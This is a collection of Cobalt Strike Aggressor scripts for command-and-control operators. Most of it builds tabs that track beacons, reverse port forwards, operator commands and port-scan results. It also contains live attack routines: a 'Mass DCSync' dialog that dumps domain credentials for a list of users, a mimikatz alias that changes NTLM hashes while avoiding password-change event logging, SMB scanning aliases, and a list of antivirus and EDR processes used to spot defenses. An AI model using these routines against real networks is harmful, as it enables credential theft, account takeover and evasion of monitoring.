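# Scans the 'archives' data model for rportfwd start/stop tasks and returns
# the forwards that are still active (started and not stopped afterwards) on
# beacons that still exist, as rows for $forwarded_ports_model.
# Returns an array of %(timestamp beacon_id beacon_pid beacon_ip beacon_user
# local_port remote_host remote_port) hashes; timestamp is dstamp()-formatted.
sub search_archives {
    ## Parses archives to pull out port forwards for the Forwarded Ports tab
    # Every name used below is declared local so nothing leaks into script scope.
    local('@output @linesAdd @linesRemove @bids %entry $bid $localport $remotehost $remoteport $lineAdd $lineRem $dontAdd');
    @bids = beacon_ids();
    @output = @();
    @linesAdd = @();
    @linesRemove = @();
    foreach %entry (data_query("archives")) {
        # To speed the search up, only task-type entries are examined.
        if(%entry['type'] ne "task") {
            continue;
        }
        # rportfwd add task
        if(indexOf(%entry['data'], "forward port ") == 0) {
            if(%entry['data'] ismatch 'forward port (\d+) to ([^:]+):(\d+)') {
                ($localport, $remotehost, $remoteport) = matched();
                $bid = %entry['bid'];
                # Forwards of beacons that no longer exist are not listed.
                if ( $bid !in @bids ) {
                    continue;
                }
                add(@linesAdd, %(
                    timestamp => %entry['when'],
                    beacon_id => $bid,
                    beacon_pid => beacon_info($bid, "pid"),
                    beacon_ip => beacon_info($bid, "host"),
                    beacon_user => beacon_info($bid, "user"),
                    local_port => $localport,
                    remote_host => $remotehost,
                    remote_port => $remoteport
                ));
            }
        }
        # rportfwd stop task
        if(indexOf(%entry['data'], "stop port forward on ") == 0) {
            if(%entry['data'] ismatch 'stop port forward on (\d+)') {
                $localport = matched()[0];
                $bid = %entry['bid'];
                if ( $bid !in @bids ) {
                    continue;
                }
                add(@linesRemove, %(
                    timestamp => %entry['when'],
                    beacon_id => $bid,
                    local_port => $localport
                ));
            }
        }
    }
    # NOTE(review): these callbacks return a boolean rather than the usual
    # negative/zero/positive value; the pairing below does not depend on
    # order, so this only influences the row order of @output.
    sort({ return $1['timestamp'] < $2['timestamp']; }, @linesAdd);
    sort({ return $1['timestamp'] < $2['timestamp']; }, @linesRemove);
    # Drop every start that has a stop for the same beacon and local port at
    # or after its own timestamp; the rest are still active.
    foreach $lineAdd (@linesAdd) {
        $dontAdd = 0;
        foreach $lineRem (@linesRemove) {
            if(($lineAdd['local_port'] eq $lineRem['local_port']) && ($lineAdd['beacon_id'] eq $lineRem['beacon_id'])) {
                if($lineRem['timestamp'] >= $lineAdd['timestamp']) {
                    $dontAdd = 1;
                    break;
                }
            }
        }
        if($dontAdd == 0) {
            # Convert to a display date only for rows that are kept.
            $lineAdd['timestamp'] = dstamp($lineAdd['timestamp']);
            add(@output, $lineAdd);
        }
    }
    return @output;
}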
# Attaches a right-click popup menu to a Swing component.
#   $1 - the component (here the forwarded-ports table)
#   $2 - the name of the popup block to show (here "forwarded_ports_menu")
# The model and table globals are handed into the fork as well, presumably so
# the popup's item blocks, shown from that environment, can read them.
sub setup_popupFT {
    # setup_popup provided by Raphael Mudge
    # https://gist.github.com/rsmudge/87ce80cd8d8d185c5870d559af2dc0c2
    # we're using fork({}) to run this in a separate Aggressor Script environment.
    # This reduces deadlock potential due to Sleep's global interpreter lock
    #
    # this especially matters as our mouse listener will be fired for *everything*
    # to include mouse movements.
    fork({
        [$component addMouseListener: lambda({
            if ([$1 isPopupTrigger]) {
                # If right click, show popup
                show_popup($1, $name, $component);
            }
        }, \$component, \$name)];
    }, $component => $1, $name => $2, $forwarded_ports_model => $forwarded_ports_model, $forwarded_ports_table => $forwarded_ports_table);
}
# Refills $forwarded_ports_model from search_archives() and notifies the
# table. Runs in a fork() so the work does not block the script interpreter.
# Takes no arguments and returns nothing.
sub update_tableFT {
    ## Updates the Forwarded Ports tab
    ## As a note: when you fork() you have to pass all global
    ## variables (see \$forwarded_ports_model and \%forwarded_ports_looking) or you'll go insane.
    fork({
        local('%entry');
        # Clear the model so we can put new stuff in it.
        [$forwarded_ports_model clear: 1024];
        foreach %entry (search_archives()) {
            # Add the new entry to $forwarded_ports_model
            [$forwarded_ports_model addEntry: %entry];
        }
        # Update with the new table
        [$forwarded_ports_model fireListeners];
    }, \$forwarded_ports_model, \%forwarded_ports_looking);
}
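# Right-click menu of the Forwarded Ports table: stops each selected remote
# port forward after the operator confirms.
popup forwarded_ports_menu {
    item "Kill port forwarding" {
        # Declare every name this item assigns so nothing leaks into script scope.
        local('$row $bid $localip $localport $remotehost $remoteport');
        foreach $row ([$forwarded_ports_table getSelectedRows]) {
            # Column indexes follow the model built in create_vis.
            # NOTE(review): getSelectedRows() yields view indexes while
            # getValueAt expects model indexes; once the table is sorted these
            # differ -- confirm ATable converts them, otherwise map each $row
            # through [$forwarded_ports_table convertRowIndexToModel: $row].
            $bid = [$forwarded_ports_model getValueAt: $row, 1];
            $localip = [$forwarded_ports_model getValueAt: $row, 3];
            $localport = [$forwarded_ports_model getValueAt: $row, 5];
            $remotehost = [$forwarded_ports_model getValueAt: $row, 6];
            $remoteport = [$forwarded_ports_model getValueAt: $row, 7];
            # The lambda captures its own copies, since the loop moves on before
            # the operator answers the prompt.
            prompt_confirm("Are you sure you want to stop remote port forwarding from $localip $+ : $+ $localport to $remotehost $+ : $+ $remoteport $+ ?", "Stop remote port forwarding", lambda({
                brportfwd_stop($bid, $localport);
                show_message("Remote port forwarding from $localip $+ : $+ $localport stopped.");
            }, $bid => $bid, $localip => $localip, $localport => $localport));
        }
    }
}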
# View menu entry that opens the Forwarded Ports tab.
popup view {
    item "Remote Forwarded Ports" {
        addTab("Remote Forwarded Ports", create_vis(), "All forwarded/remote forwarded ports");
    }
}
# Keeps the archives consistent when a port forward fails to start: a bind
# failure is answered with a stop task for the same local port, so every
# "forward port" entry has a matching "stop port forward" entry.
#   $1 - beacon id
#   $2 - error text
# NOTE(review): a second `on beacon_error` handler is defined further down in
# this file; confirm Aggressor runs both rather than only the last registered.
on beacon_error {
    if(indexOf($2, "Could not bind to ") == 0) {
        # Dummy rportfwd stop to maintain our archives integrity by having both start and stop commands, even
        # in a case of failure.
        if($2 ismatch 'Could not bind to (\d+)') {
            brportfwd_stop!($1, matched()[0]);
        }
    }
}
#
# Highlights newly checking-in Beacons green and those exiting red for a defined time.
#
# Author:
# Mariusz B. / mgeeky, "20
# <mb [at] binary-offensive.com>
# (https://github.com/mgeeky)
#
global('%KNOWN_BEACONS $HIGHLIGHT_DURATION %HIGHLIGHTS');
# Highlight duration expressed in milliseconds (compared against ticks()
# differences in heartbeat_1s).
$HIGHLIGHT_DURATION = 5000;
# Event name -> accent handed to highlight("beacons", ...). An empty value
# disables the highlight for that event (see the `ne ""` checks in the handlers).
%HIGHLIGHTS = %(
    initial => "good",
    exit => "bad",
    exited => "ignore",
    error => "neutral",
    output => ""
);
# ---------------------------------------
# Do not alter variables below this point
# beacon id -> %(ticks, status, prev-accent); maintained by the handlers below.
%KNOWN_BEACONS = %();
# Returns the beacon's data row (from bdata) wrapped in a one-element array,
# which is the form the callers pass on to highlight("beacons", ...).
#   $1 - beacon id
sub getBeaconEntry {
    return @(bdata($1));
}
# Applies the accent configured in %HIGHLIGHTS for an event to a beacon row,
# remembering the accent it had before so heartbeat_1s can restore it.
#   @entry - the beacon row as returned by getBeaconEntry()
#   $bid   - beacon id
#   $col   - key into %HIGHLIGHTS (initial, exit, exited, error, output)
sub highlightBeacon {
    local('@entry $bid $col $cur');
    (@entry, $bid, $col) = @_;
    $cur = binfo($bid, "_accent");
    # Nothing to do when the row already carries the requested accent.
    if($cur eq %HIGHLIGHTS[$col]) {
        return;
    }
    %KNOWN_BEACONS[$bid]["prev-accent"] = $cur;
    highlight("beacons", @entry, %HIGHLIGHTS[$col]);
}
# First check-in of a beacon: record it and flash its row with the "initial"
# accent. Beacons already present in %KNOWN_BEACONS are left untouched.
#   $1 - beacon id
on beacon_initial {
    local('@entry');
    if($1 in keys(%KNOWN_BEACONS)) {
        return;
    }
    %KNOWN_BEACONS[$1] = %();
    # "ticks" marks when the highlight started; heartbeat_1s expires it.
    %KNOWN_BEACONS[$1]["ticks"] = ticks();
    @entry = getBeaconEntry($1);
    if(@entry) {
        %KNOWN_BEACONS[$1]["status"] = 'initial';
        highlightBeacon(@entry, $1, "initial");
    }
}
# Beacon produced output: refresh its timestamp and, if no other status is
# pending and an "output" accent is configured, highlight the row. With the
# default %HIGHLIGHTS (output => "") the highlight part never runs.
#   $1 - beacon id
on beacon_output {
    local('@entry');
    if($1 !in keys(%KNOWN_BEACONS)) {
        %KNOWN_BEACONS[$1] = %();
    }
    %KNOWN_BEACONS[$1]["ticks"] = ticks();
    @entry = getBeaconEntry($1);
    if(@entry && (%KNOWN_BEACONS[$1]["status"] eq "") && (%HIGHLIGHTS["output"] ne "")) {
        highlightBeacon(@entry, $1, "output");
    }
}
# Same handling as beacon_output, for the alternate-output event.
# Author's note: doesn't work for some reason.
#   $1 - beacon id
on beacon_output_alt {
    local('@entry');
    if($1 !in keys(%KNOWN_BEACONS)) {
        %KNOWN_BEACONS[$1] = %();
    }
    %KNOWN_BEACONS[$1]["ticks"] = ticks();
    @entry = getBeaconEntry($1);
    if(@entry && (%KNOWN_BEACONS[$1]["status"] eq "") && (%HIGHLIGHTS["output"] ne "")) {
        highlightBeacon(@entry, $1, "output");
    }
}
# Beacon reported an error: mark it with the "error" status and accent
# (unless the "error" accent is configured empty).
#   $1 - beacon id
# NOTE(review): an earlier `on beacon_error` handler exists in this file
# (the rportfwd bind-failure one); confirm both are invoked.
on beacon_error {
    local('@entry');
    if($1 !in keys(%KNOWN_BEACONS)) {
        %KNOWN_BEACONS[$1] = %();
    }
    %KNOWN_BEACONS[$1]["ticks"] = ticks();
    @entry = getBeaconEntry($1);
    if(@entry && (%HIGHLIGHTS["error"] ne "")) {
        %KNOWN_BEACONS[$1]["status"] = 'error';
        highlightBeacon(@entry, $1, "error");
    }
}
# Operator typed "exit" into a Beacon console: flash the row with the "exit"
# accent and mark it as exiting.
#   $1 - beacon id
#   $3 - the command text typed
# NOTE(review): the remove() at the end drops this beacon's record right away
# (remove() deletes by value, and the value is the beacon's own hash), so the
# "exiting" -> "exited" transition in heartbeat_1s never finds it and the
# saved prev-accent is never restored -- confirm that is intended.
on beacon_input {
    local('@entry');
    if($1 !in keys(%KNOWN_BEACONS)) {
        %KNOWN_BEACONS[$1] = %();
    }
    if ($3 eq "exit") {
        %KNOWN_BEACONS[$1]["ticks"] = ticks();
        @entry = getBeaconEntry($1);
        if(@entry) {
            %KNOWN_BEACONS[$1]["status"] = 'exiting';
            highlightBeacon(@entry, $1, "exit");
        }
        remove(%KNOWN_BEACONS, %KNOWN_BEACONS[$1]);
    }
}
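# Once a second, expire highlights shown for at least $HIGHLIGHT_DURATION ms:
# a beacon in the "exiting" state moves on to the "exited" accent, any other
# gets back the accent saved by highlightBeacon() and a cleared status.
# heartbeat_1s carries no arguments, so the beacon id comes from the loop
# variable $bid (the previous use of $1 here addressed a non-existent key).
on heartbeat_1s {
    local('$diff $b @entry $bid');
    foreach $bid (keys(%KNOWN_BEACONS)) {
        $b = %KNOWN_BEACONS[$bid];
        # An empty "ticks" means this beacon's highlight was already expired.
        if("ticks" in keys($b)) {
            if(strlen($b["ticks"]) > 0) {
                $diff = ticks() - $b["ticks"];
                if($diff >= $HIGHLIGHT_DURATION) {
                    @entry = getBeaconEntry($bid);
                    if(@entry) {
                        if(%KNOWN_BEACONS[$bid]["status"] eq "exiting") {
                            %KNOWN_BEACONS[$bid]["status"] = 'exited';
                            highlightBeacon(@entry, $bid, "exited");
                        }
                        else {
                            highlight("beacons", @entry, %KNOWN_BEACONS[$bid]["prev-accent"]);
                            %KNOWN_BEACONS[$bid]["status"] = "";
                        }
                    }
                    # Single-shot: clear the stamp so this entry is not expired again.
                    %KNOWN_BEACONS[$bid]["ticks"] = "";
                }
            }
        }
    }
}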
# Beacon Command Log visualization
# Author: @001SPARTaN (for @r3dqu1nn)
# Tracks all your commands you executed on every beacon
import ui.*;
import table.*;
import java.awt.*;
import javax.swing.*;
import javax.swing.table.*;
# $table is also declared global by the port-scan results script later in
# this file, so the two visualizations share it.
global('$model $console $table');
# Initial (empty) command-log model; createVisualizationLog() builds a fresh
# one with the same columns when the tab is opened.
$model = [new GenericTableModel: @("operator", "ip", "hostname", "user", "pid", "command", "timestamp"), "beacon", 16];
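# Rebuilds $model from the 'beaconlog' data model: one row per beacon_input
# record, annotated with the beacon's address, hostname, user and pid.
# Runs inside fork(), which shares no script variables, so $model is passed
# in explicitly. Takes no arguments and returns nothing.
sub updateTableLog {
    fork({
        # Declared local so the fork's script scope stays clean.
        local('@entry %modelEntry $bid');
        # Clear the model so we can put new stuff in it.
        [$model clear: 1024];
        foreach @entry (data_query('beaconlog')) {
            # Record layout as indexed here: event, bid, operator, text, when.
            # Only beacon_input records carry a command.
            if (@entry[0] ne "beacon_input") {
                continue;
            }
            $bid = @entry[1];
            # A fresh hash per row, so every addEntry receives its own map.
            %modelEntry = %(
                operator => @entry[2],
                ip => binfo($bid, "internal"),
                hostname => binfo($bid, "computer"),
                user => binfo($bid, "user"),
                pid => binfo($bid, "pid"),
                command => @entry[3],
                timestamp => formatDate(@entry[4], "MMM dd HH:mm:ss z")
            );
            # Add the new entry to $model
            [$model addEntry: %modelEntry];
        }
        # Update with the new table
        [$model fireListeners];
    }, \$model);
}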
# setupPopupMenu provided by Raphael Mudge
# https://gist.github.com/rsmudge/87ce80cd8d8d185c5870d559af2dc0c2
# Attaches a right-click popup menu to a Swing component.
#   $1 - the component (a table)
#   $2 - the name of the popup block to show
# $model and $table are handed into the fork as well, presumably so the
# popup's item blocks, shown from that environment, can read them.
sub setupPopupMenu {
    # we're using fork({}) to run this in a separate Aggressor Script environment.
    # This reduces deadlock potential due to Sleep's global interpreter lock
    #
    # this especially matters as our mouse listener will be fired for *everything*
    # to include mouse movements.
    fork({
        [$component addMouseListener: lambda({
            if ([$1 isPopupTrigger]) {
                # If right click, show popup
                show_popup($1, $name, $component);
            }
        }, \$component, \$name)];
    }, $component => $1, $name => $2, $model => $model, $table => $table);
}
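# Builds the "Beacon Command Log" visualization: an ATable over $model with
# column sorting, wrapped in a JScrollPane and registered with Cobalt Strike.
# Returns the JScrollPane for addTab(). Takes no arguments.
sub createVisualizationLog {
    # $sorter and $content are only needed here; keep them out of script scope.
    local('$sorter $content');
    # GenericTableModel from table.*; columns for each data model
    $model = [new GenericTableModel: @("operator", "ip", "hostname", "user", "pid", "command", "timestamp"), "beacon", 16];
    # Create a table from the GenericTableModel
    $table = [new ATable: $model];
    # Controls how the column headers will sort the table; the initial sort is
    # on column 3.
    $sorter = [new TableRowSorter: $model];
    [$sorter toggleSortOrder: 3];
    # NOTE(review): column 3 is "user" (a string) yet compares with <=>, while
    # "pid" (column 4) gets no comparator -- the indexes look shifted by one;
    # confirm the intended columns before changing them.
    [$sorter setComparator: 0, {
        return $1 cmp $2;
    }];
    [$sorter setComparator: 1, {
        return $1 cmp $2;
    }];
    [$sorter setComparator: 2, {
        return $1 cmp $2;
    }];
    [$sorter setComparator: 3, {
        return $1 <=> $2;
    }];
    # Set $sorter as the row sorter for $table
    [$table setRowSorter: $sorter];
    # Scrollable container for the table
    $content = [new JScrollPane: $table];
    # Set popup menu for the table, then fill it
    setupPopupMenu($table, "command_log");
    updateTableLog();
    # Register the visualization with CS
    addVisualization("Beacon Command Log", $content);
    return $content;
}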
# Right-click menu of the command-log table: copies the selected rows to the
# clipboard, one line each, in the format
#   operator [ip_hostname] user/proc | timestamp> command
# NOTE(review): the println() below is debug output left in; the variables
# used here are not declared local(); and this popup is also attached to the
# port-scan table later in the file although it reads $model (the command-log
# model) -- since $table is a shared global, copying from whichever tab was
# opened last may read mismatched rows. Confirm before relying on it.
popup command_log {
    item "Copy" {
        println("Right click captured!");
        $selected = "";
        foreach $row ([$table getSelectedRows]) {
            # operator [ip_hostname] user/proc | timestamp> command
            $operator = [$model getValueAt: $row, 0];
            $ip = [$model getValueAt: $row, 1];
            $hostname = [$model getValueAt: $row, 2];
            $user = [$model getValueAt: $row, 3];
            $proc = [$model getValueAt: $row, 4];
            $time = [$model getValueAt: $row, 6];
            $command = [$model getValueAt: $row, 5];
            $selected .= "$operator \[$ip\_$hostname\] $user\/$proc | $time\> $command\n";
        }
        add_to_clipboard($selected);
    }
}
# View menu entry that opens the Beacon Command Log tab.
popup view {
    item "Command Log" {
        # Show the visualization
        addTab("Beacon Command Log", createVisualizationLog(), "All commands you have executed in a beacon");
    }
}
# Refresh the command log whenever a command is typed into any Beacon console.
# Two other `on beacon_input` handlers exist earlier in this file.
on beacon_input {
    updateTableLog();
}
#author:bluescreenofjeff
#Mass DCSync a list of usernames from the specified domain
#Note: The username list should include one user's shortname per line
# Opens the "Mass DCSync" dialog. On Ok, the callback reads the user list file
# (one name per line) and calls bdcsync() once per beacon in $1 and per user.
#   $1 - the beacon id(s) the popup was opened on
# @bids is not declared local(), which is how the lambda below can read it
# from script scope (it captures nothing explicitly).
sub mass-dcsync {
    @bids = $1;
    $dialog = dialog("Mass DCSync", %(fqdn => "example.local", domain => 'EXAMPLE', userlist => "/path/to/userlist"), lambda({
        # $3 holds the dialog's values keyed by row name (see drow_* below).
        $handle = openf($3['userlist']);
        @userlistdata = readAll($handle);
        closef($handle);
        foreach $bid (@bids){
            foreach $user (@userlistdata){
                bdcsync($bid, $3['$fqdn'], $3['domain'] . $+ . '\\' . $+ . $user);
            };
        };
    }));
    dialog_description($dialog, "Mass DCSync a list of usernames from the specified domain.");
    drow_text($dialog, "fqdn", "Domain FQDN:");
    drow_text($dialog, "domain", "Domain Shortname:");
    drow_file($dialog, "userlist", "List of users:");
    dbutton_action($dialog, "Ok");
    dialog_show($dialog);
}
# Beacon context-menu entry that opens the Mass DCSync dialog for the
# selected beacon(s).
popup beacon_bottom {
    item "Mass DCSync" {
        mass-dcsync($1);
    }
}
# Cobalt Strike Mimikatz Enhancement CNA Addon
# Created by @vysecurity
#
# Credits to @armitagehacker (cobaltstrike) and @gentilkiwi (mimikatz)
# Beacon console alias: builds a mimikatz lsadump::changentlm command line
# from the arguments and, after a confirmation prompt, tasks the beacon with it.
# A 32-hex-character argument is treated as an NTLM hash, anything else as a
# password. Requires $2, $3 and $4; $5 is optional.
# NOTE(review): the "No server specified" berror() call passes one argument
# while the one below passes ($1, text) -- confirm the intended signature.
# The prompt_confirm callback captures nothing, so it relies on $bid and
# $command being script-scope (not local()).
alias password_change {
    # $1: Beacon id
    # $2: Username
    # $3: Old hash or password
    # $4: New hash or password
    # $5: SERVERNAME/DC/Localhost
    $bid = $1;
    $user = $2;
    $old = $3;
    $new = $4;
    $server = $5;
    if ($user && $old && $new){
        $command = "lsadump::changentlm /user:$user";
        # Check if $old is a hash
        if ($old ismatch '[a-fA-F0-9]{32}'){
            $command = $command . " /oldntlm:$old";
        }
        else {
            $command = $command . " /oldpassword:$old";
        }
        # Check if new is a hash
        if ($new ismatch '[a-fA-F0-9]{32}'){
            $command = $command . " /newntlm:$new";
        }
        else{
            $command = $command . " /newpassword:$new";
        }
        if ($server){
            $command = $command . " /server:$server";
        }
        else{
            berror("No server specified, defaulting to localhost.");
        }
        prompt_confirm("Are you sure you want to execute?\nCommand: $command", "Confirmation", {
            btask($bid, "$command");
            bmimikatz($bid, "$command");
        });
    }
    else{
        berror($1,"Missing parameters, you need exactly 4.");
    }
}
# Help text for the password_change alias (shown by the Beacon console's help).
beacon_command_register("password_change", "Executes a password change which allows you to change the NTLM password for a given account.",
"Syntax: password_change [Username] [Known old hash or password] [New hash or password] [SERVER/DC/localhost] \n" .
"Uses Mimikatz's password change functionality which allows you to change the NTLM password for a given account without the setpassword event logging.\n".
"Useful for situations where you do not know the cleartext original password so you can change the password quickly and reset the NTLM hash after you're done.");
#author bluescreenofjeff
#alias for "qping" to "shell ping -n 1 [target]" and "smbscan" to "portscan [target] 445 none"
#register help
# Help text for the qping alias defined below.
beacon_command_register("qping", "send one ping packet with shell",
"Synopsis: qping [target]\n\n" .
"Send one ping packet with the command: shell ping -n 1 [target]");
#setting the alias
# Beacon console alias: logs and runs "ping -n 1 [target]" through bshell.
#   $1 - beacon id
#   $2 - target
alias qping {
    binput($1,"shell ping -n 1 $2");
    bshell($1,"ping -n 1 $2");
}
#register help
# Help text for the smbscan alias defined below.
beacon_command_register("smbscan", "portscans port 445 without ping discovery",
"Synopsis: smbscan [target]\n\n" .
"Scans SMB with the command: portscan [targets] none\n\n" .
"[targets] is a comma separated list of hosts to scan. You may also specify\n" .
"IPv4 address ranges (e.g., 192.168.1.128-192.168.2.240, 192.168.1.0/24)");
#setting the alias
# Beacon console alias: runs bportscan against $2 on port 445 with no discovery.
#   $1 - beacon id
#   $2 - targets
# NOTE(review): binput() is called with a single argument here whereas qping
# passes ($1, text), and the text interpolates $1 (the beacon id) rather than
# the targets in $2 -- confirm the intended logging call.
alias smbscan {
    binput("portscan $1 445 none");
    bportscan($1, $2, "445", "none");
}
#### Port Scan Results ####
## See and sort results from portscan module in a new tab
## Author: Alyssa (@ramen0x3f)
## Last Updated: 2018-08-08
## CREDIT ##
# This script uses the awesome visualization/tab code made by @001SPARTaN (for @r3dqu1nn)
# As seen here: https://github.com/harleyQu1nn/AggressorScripts/blob/master/logvis.cna
## Usage ##
# View > "Port Scan Results". Click column to sort.
######################################################################
import ui.*;
import table.*;
import java.awt.*;
import javax.swing.*;
import javax.swing.table.*;
# $console and $table are also declared global by the command-log script
# above, so $table is shared between the two visualizations.
global('$portScanModel $console $table');
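# Rebuilds $portScanModel from the 'services' data model: one row per
# discovered service with its address, port and banner. Runs inside fork(),
# which shares no script variables, so $portScanModel is passed in explicitly.
# Takes no arguments and returns nothing.
sub updateTablePSR {
    fork({
        # Declared local so the fork's script scope stays clean.
        local('@entry %modelEntry');
        # Clear the model so we can put new stuff in it.
        [$portScanModel clear: 1024];
        foreach @entry (data_query('services')) {
            # A fresh hash per row, so every addEntry receives its own map.
            %modelEntry = %(
                address => @entry['address'],
                port => @entry['port'],
                banner => @entry['banner']
            );
            # Add the new entry to $portScanModel
            [$portScanModel addEntry: %modelEntry];
        }
        # Update with the new table
        [$portScanModel fireListeners];
    }, \$portScanModel);
}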
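# Builds the "Port Scan Results" visualization: an ATable over $portScanModel
# with column sorting, wrapped in a JScrollPane and registered with Cobalt
# Strike. Returns the JScrollPane for addTab(). Takes no arguments.
sub createVisualizationPSR {
    # $sorter and $content are only needed here; keep them out of script scope.
    local('$sorter $content');
    # GenericTableModel from table.*; columns for each data model
    $portScanModel = [new GenericTableModel: @("address", "port", "banner"), "beacon", 16];
    # Create a table from the GenericTableModel
    $table = [new ATable: $portScanModel];
    # Controls how the column headers will sort the table. The model has three
    # columns (0..2) and DefaultRowSorter rejects an out-of-range column index,
    # so no comparator or initial sort is set for a column 3; click a header
    # to sort. Ports compare as strings here, as "address" and "banner" do.
    $sorter = [new TableRowSorter: $portScanModel];
    [$sorter setComparator: 0, {
        return $1 cmp $2;
    }];
    [$sorter setComparator: 1, {
        return $1 cmp $2;
    }];
    [$sorter setComparator: 2, {
        return $1 cmp $2;
    }];
    # Set $sorter as the row sorter for $table
    [$table setRowSorter: $sorter];
    # Scrollable container for the table
    $content = [new JScrollPane: $table];
    # Set popup menu for the table, then fill it.
    # NOTE(review): "command_log" is the command-log popup, whose Copy item
    # reads $model with seven columns; a popup written for $portScanModel
    # would be needed for copying from this table to work as expected.
    setupPopupMenu($table, "command_log");
    updateTablePSR();
    # Register the visualization with CS
    addVisualization("Port Scan Results", $content);
    return $content;
}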
# View menu entry that opens the Port Scan Results tab.
popup view {
    item "Port Scan Results" {
        # Show the visualization
        addTab("Port Scan Results", createVisualizationPSR(), "All discovered services from portscan");
    }
}
#Color Coded Process Listing
#Author: @r3dQu1nn
#Takes the PS output in CS and color codes all AV processes, explorer process, browsers processes, and current process running
#Thanks to @oldb00t for creating the original beacon-ps-highlight.cna script! Script here: https://github.com/oldb00t/AggressorScripts/tree/master/Ps-highlight
#This script removes the need for the av_hips_executables.txt requirement
set BEACON_OUTPUT_PS {
$bd = bdata($1);
@av = @("Tanium.exe", "360RP.exe", "360SD.exe", "360Safe.exe", "360leakfixer.exe", "360rp.exe", "360safe.exe", "360sd.exe", "360tray.exe", "AAWTray.exe", "ACAAS.exe", "ACAEGMgr.exe", "ACAIS.exe", "AClntUsr.EXE", "ALERT.EXE", "ALERTSVC.EXE", "ALMon.exe", "ALUNotify.exe", "ALUpdate.exe", "ALsvc.exe", "AVENGINE.exe", "AVGCHSVX.EXE", "AVGCSRVX.EXE", "AVGIDSAgent.exe", "AVGIDSMonitor.exe", "AVGIDSUI.exe", "AVGIDSWatcher.exe", "AVGNSX.EXE", "AVKProxy.exe", "AVKService.exe", "AVKTray.exe", "AVKWCtl.exe", "AVP.EXE", "AVP.exe", "AVPDTAgt.exe", "AcctMgr.exe", "Ad-Aware.exe", "Ad-Aware2007.exe", "AddressExport.exe", "AdminServer.exe", "Administrator.exe", "AeXAgentUIHost.exe", "AeXNSAgent.exe", "AeXNSRcvSvc.exe", "AlertSvc.exe", "AlogServ.exe", "AluSchedulerSvc.exe", "AnVir.exe", "AppSvc32.exe", "AtrsHost.exe", "Auth8021x.exe", "AvastSvc.exe", "AvastUI.exe", "Avconsol.exe", "AvpM.exe", "Avsynmgr.exe", "Avtask.exe", "BLACKD.exe", "BWMeterConSvc.exe", "CAAntiSpyware.exe", "CALogDump.exe", "CAPPActiveProtection.exe", "CAPPActiveProtection.exe", "CB.exe", "CCAP.EXE", "CCenter.exe", "CClaw.exe", "CLPS.exe", "CLPSLA.exe", "CLPSLS.exe", "CNTAoSMgr.exe", "CPntSrv.exe", "CTDataLoad.exe", "CertificationManagerServiceNT.exe", "ClShield.exe", "ClamTray.exe", "ClamWin.exe", "Console.exe", "CylanceUI.exe", "DAO_Log.exe", "DLService.exe", "DLTray.EXE", "DLTray.exe", "DRWAGNTD.EXE", "DRWAGNUI.EXE", "DRWEB32W.EXE", "DRWEBSCD.EXE", "DRWEBUPW.EXE", "DRWINST.EXE", "DSMain.exe", "DWHWizrd.exe", "DefWatch.exe", "DolphinCharge.exe", "EHttpSrv.exe", "EMET_Agent.exe", "EMET_Service.exe", "EMLPROUI.exe", "EMLPROXY.exe", "EMLibUpdateAgentNT.exe", "ETConsole3.exe", "ETCorrel.exe", "ETLogAnalyzer.exe", "ETReporter.exe", "ETRssFeeds.exe", "EUQMonitor.exe", "EndPointSecurity.exe", "EngineServer.exe", "EntityMain.exe", "EtScheduler.exe", "EtwControlPanel.exe", "EventParser.exe", "FAMEH32.exe", "FCDBLog.exe", "FCH32.exe", "FPAVServer.exe", "FProtTray.exe", "FSCUIF.exe", "FSHDLL32.exe", "FSM32.exe", 
"FSMA32.exe", "FSMB32.exe", "FWCfg.exe", "FireSvc.exe", "FireTray.exe", "FirewallGUI.exe", "ForceField.exe", "FortiProxy.exe", "FortiTray.exe", "FortiWF.exe", "FrameworkService.exe", "FreeProxy.exe", "GDFirewallTray.exe", "GDFwSvc.exe", "HWAPI.exe", "ISNTSysMonitor.exe", "ISSVC.exe", "ISWMGR.exe", "ITMRTSVC.exe", "ITMRT_SupportDiagnostics.exe", "ITMRT_TRACE.exe", "IcePack.exe", "IdsInst.exe", "InoNmSrv.exe", "InoRT.exe", "InoRpc.exe", "InoTask.exe", "InoWeb.exe", "IsntSmtp.exe", "KABackReport.exe", "KANMCMain.exe", "KAVFS.EXE", "KAVStart.exe", "KLNAGENT.EXE", "KMailMon.exe", "KNUpdateMain.exe", "KPFWSvc.exe", "KSWebShield.exe", "KVMonXP.exe", "KVMonXP_2.exe", "KVSrvXP.exe", "KWSProd.exe", "KWatch.exe", "KavAdapterExe.exe", "KeyPass.exe", "KvXP.exe", "LUALL.EXE", "LWDMServer.exe", "LockApp.exe", "LockAppHost.exe", "LogGetor.exe", "MCSHIELD.EXE", "MCUI32.exe", "MSASCui.exe", "ManagementAgentNT.exe", "McAfeeDataBackup.exe", "McEPOC.exe", "McEPOCfg.exe", "McNASvc.exe", "McProxy.exe", "McScript_InUse.exe", "McWCE.exe", "McWCECfg.exe", "Mcshield.exe", "Mctray.exe", "MgntSvc.exe", "MpCmdRun.exe", "MpfAgent.exe", "MpfSrv.exe", "MsMpEng.exe", "NAIlgpip.exe", "NAVAPSVC.EXE", "NAVAPW32.EXE", "NCDaemon.exe", "NIP.exe", "NJeeves.exe", "NLClient.exe", "NMAGENT.EXE", "NOD32view.exe", "NPFMSG.exe", "NPROTECT.EXE", "NRMENCTB.exe", "NSMdtr.exe", "NTRtScan.exe", "NVCOAS.exe", "NVCSched.exe", "NavShcom.exe", "Navapsvc.exe", "NaveCtrl.exe", "NaveLog.exe", "NaveSP.exe", "Navw32.exe", "Navwnt.exe", "Nip.exe", "Njeeves.exe", "Npfmsg2.exe", "Npfsvice.exe", "NscTop.exe", "Nvcoas.exe", "Nvcsched.exe", "Nymse.exe", "OLFSNT40.EXE", "OMSLogManager.exe", "ONLINENT.exe", "ONLNSVC.exe", "OfcPfwSvc.exe", "PASystemTray.exe", "PAVFNSVR.exe", "PAVSRV51.exe", "PNmSrv.exe", "POPROXY.EXE", "POProxy.exe", "PPClean.exe", "PPCtlPriv.exe", "PQIBrowser.exe", "PSHost.exe", "PSIMSVC.EXE", "PXEMTFTP.exe", "PadFSvr.exe", "Pagent.exe", "Pagentwd.exe", "PavBckPT.exe", "PavFnSvr.exe", "PavPrSrv.exe", "PavProt.exe", 
